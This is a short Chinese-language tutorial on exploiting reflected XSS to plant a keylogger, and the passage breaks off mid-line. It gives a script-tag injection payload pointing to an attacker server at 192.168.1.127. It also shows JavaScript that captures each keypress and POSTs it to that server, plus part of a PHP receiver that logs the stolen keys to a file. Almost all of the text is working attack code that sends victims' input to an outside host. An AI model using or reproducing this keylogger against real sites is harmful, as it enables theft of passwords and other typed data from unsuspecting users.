原则上:只要XSS漏洞存在,可以编写任何功能的js脚本
反射型漏洞利用
键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上
服务器:kali 客户端
启动apache2服务:service apache2 start
语法:
<script src="http://192.168.1.127/keylogger.js"></script>
keylogger.js 键盘记录器 需要修改里面的接受地址
document.onkeypress = function(evt) {
evt = evt || window.event
key = String.fromCharCode(evt.charCode)
if(key) {
var http = new XMLHttpRequest();
var param = encodeURI(key)
http.open("POST","http://192.168.1.127/keylogger.php",true);
http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
http.send("key="+param);
}
}
keylogger.php 【用来接受客户端提交上来的数据】
<?php
$key=$_POST['key'];
$logfile="keylog.txt";
$fp = fopen($logfile,"a");
fwrite(